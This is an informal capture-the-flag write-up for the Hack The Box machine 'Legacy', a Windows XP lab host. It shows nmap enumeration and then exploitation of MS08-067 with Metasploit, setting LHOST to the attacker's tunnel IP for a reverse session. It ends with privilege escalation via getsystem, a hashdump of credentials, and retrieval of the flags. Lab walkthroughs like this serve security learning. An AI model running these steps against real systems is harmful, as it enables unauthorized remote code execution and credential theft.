This machine mimics a windows legacy (windows xp). it’s a straight forward one depends on a public exploit for the (MS08-067) patch leads to RCE and gets us root access directly.
enjoy..
1. Enumeration:
- Nmap:
$ nmap -sC -sV 10.10.10.4 -Pn
The ports of interest (139, 445).
2. let’s do a vulnerability scan on them:
$ sudo nmap -p139,445 --script vuln 10.10.10.4
It revealed an RCE in the samba version with cve number (2008-4250) or (MS08-067) patch.
let’s searchsploit it:
And it also has lots of exploits on exploitdb and rapid7.
3. Exploitation:
let’s search for exploits on metasploit:
$ msfconsole -q >> for quite mode openning without banner
$ search ms08-067 >> searching with the patch name
$ use exploit/windows/smb/ms08_067_netapi >> to use the found exploit
then:
$ show options >> to see what options to customize
$ set rhosts 10.10.10.4 >> machine ip
$ set lhost 10.10.x.x >> your tunnel ip
finally:
$ run or exploit
- Once we have the meterpreter session, it is slightly more difficult to use commands or enumerate which user we are as it is pre Windows XP SP2 and thus the “whoami” command does not exist yet.
- But we can either use “PsExec” to get a system shell or simply use the “getsystem” meterpreter command. also using “shell” command works fine but didn’t like it.
> getsystem
> hashdump
> search -f user.txt
> sysinfo
pwd
cd ../../
cd Documents\ and\ Settings
cd john then cd Desktop
cat user.txt
getting root.txt:
search -f root.txt
cd ../..
pwd > Documents\ and\ Settings again
then
cd Administrator
cd Desktop
cat root.txt
And that’s it.. hope you enjoyed..
If so Kindly give me respect Wh1rlw1nd-HTB.